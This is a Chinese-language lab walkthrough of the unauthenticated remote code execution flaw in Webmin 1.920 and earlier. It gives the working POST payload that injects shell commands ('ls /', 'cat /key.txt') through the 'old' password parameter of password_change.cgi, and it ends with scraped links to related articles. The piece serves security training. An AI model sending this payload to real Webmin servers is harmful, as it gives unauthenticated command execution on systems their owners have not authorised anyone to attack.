01 背景介绍

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

02 影响版本:

Webmin<=1.920

03 利用方式

1.修改路径 session_ login.cgi 为 password_change.cgi
2.修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

04 漏洞靶场

1.使用burp抓包,修改下面的数据包
## poc:
1.修改路径 session_ login.cgi 为 password_change.cgi
2.修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

修改后的数据包如下

查看key.txt :
user=jammny&pam=&expired=2&old=test1|cat /key.txt&new1=test2&new2=test2

Webmin未经身份验证的远程代码执行-墨者学院相关推荐

  1. 墨者学院—Webmin未经身份验证的远程代码执行(简单复习)

    墨者学院-Webmin未经身份验证的远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理 ...

  2. Webmin未经身份验证的远程代码执行

    [墨者学院]--Webmin未经身份验证的远程代码执行 做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/1000112 ...

  3. Horizon DAAS环境Log4J远程代码执行漏洞危害减轻措施

    一.问题描述 2021 年 12 月 9 日,VMware 威胁分析部门 (TAU) 也注意到Java Log4j 模块中存在的一个大规模.高影响的漏洞.此漏洞称为 Log4Shell,安全跟踪编码为 ...

  4. 注意!多款智能家居Hub存在远程代码执行漏洞

    近日,有研究团队在三个不同的家庭集线器– Fibaro Home Center Lite,Homematic中央控制单元(CCU2)和eLAN-RF-003中发现了许多严重的安全漏洞.这些设备用于监视 ...

  5. CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞

    VoIPMonitor未授权远程代码执行漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042 测试代码执行 0X005 PO ...

  6. WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

    1.产品简介 Oracle WebLogic Server是一个统一的可扩展平台,用于在本地和云端开发.部署和运行企业应用程序,例如 Java.WebLogic Server提供了Java Enter ...

  7. Linux Kernel 远程代码执行漏洞(CVE-2022-47939)

    Linux Kernel 远程代码执行漏洞(CVE-2022-47939) CVE-2022-47939 据Security Affairs消息,近期披露的一个严重 Linux 内核漏洞会影响 SMB ...

  8. 思科NGA设备中发现的高严重性漏洞,漏洞可导致未经身份验证即可远程攻击设备

    "Cisco NetFlow Generation Appliance(NGA)的流控制传输协议(SCTP)解码器中的漏洞可能允许未经身份验证的远程攻击者导致设备挂起或意外重新加载,从而导致 ...

  9. linux内核远程漏洞,CVE-2019-11815:Linux内核竞争条件漏洞导致远程代码执行

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一 ...

最新文章

  1. 在大厂干了几年开发后,太真实了。
  2. (少儿教育) 数学-培训计划
  3. 基于灰度的模板匹配算法(一):MAD、SAD、SSD、MSD、NCC、SSDA算法
  4. TCP/IP协议簇分层详解---转
  5. 软件测试矩阵,什么是过程/数据矩阵(U/C矩阵)?
  6. [数据库] Oracle使用CASE判断解决多值问题
  7. 如何用JavaScript实现获取验证码的效果
  8. JPA数据库架构生成
  9. 移动端页面字体在微信被放大,导致排版错乱
  10. python模块离线安装_离线安装db2的python模块ibm_db
  11. 关于JavaScript的数组随机排序
  12. 161011、oracle批量插入数据
  13. 解决XCode安装插件后插件不能使用的问题(转载)
  14. 如何用python画哆啦爱梦_python3 turtle 绘制哆啦A梦
  15. [转载] python 常用类库!
  16. C#一个完整的电子邮件操作类
  17. 基于ASP.NET的网络购物系统设计与实现
  18. 小莫取色精灵 使用教程_MQ
  19. PPC2003SE开发日记-资源之工具安装(JONSON原创)
  20. ES部分查询方法,elasticsearch查询方法

热门文章

  1. Markdown 编辑器设置字体大小颜色
  2. ASP.NET MVC #8211; 视图
  3. 美摄科技推出桌面端专业视频编辑解决方案——美映PC版
  4. 阿尔茨海默病与正常衰老中的脑萎缩研究进展
  5. jy-12-SPRINGMYBATIS02——云笔记02-刘苍松
  6. 论文阅读: [3d]Audio-driven Talking Face Video Generation with Learning-based Personalized Head Pose
  7. 影院在线选座购票API接口
  8. MatLab实现的ftt大数乘法
  9. Go实战--golang中获取公网ip、查看内网ip、检测ip类型、校验ip区间、ip地址string和int转换、根据ip判断地区国家运营商等
  10. JavaSE探赜索隐之乾坤袋(集合)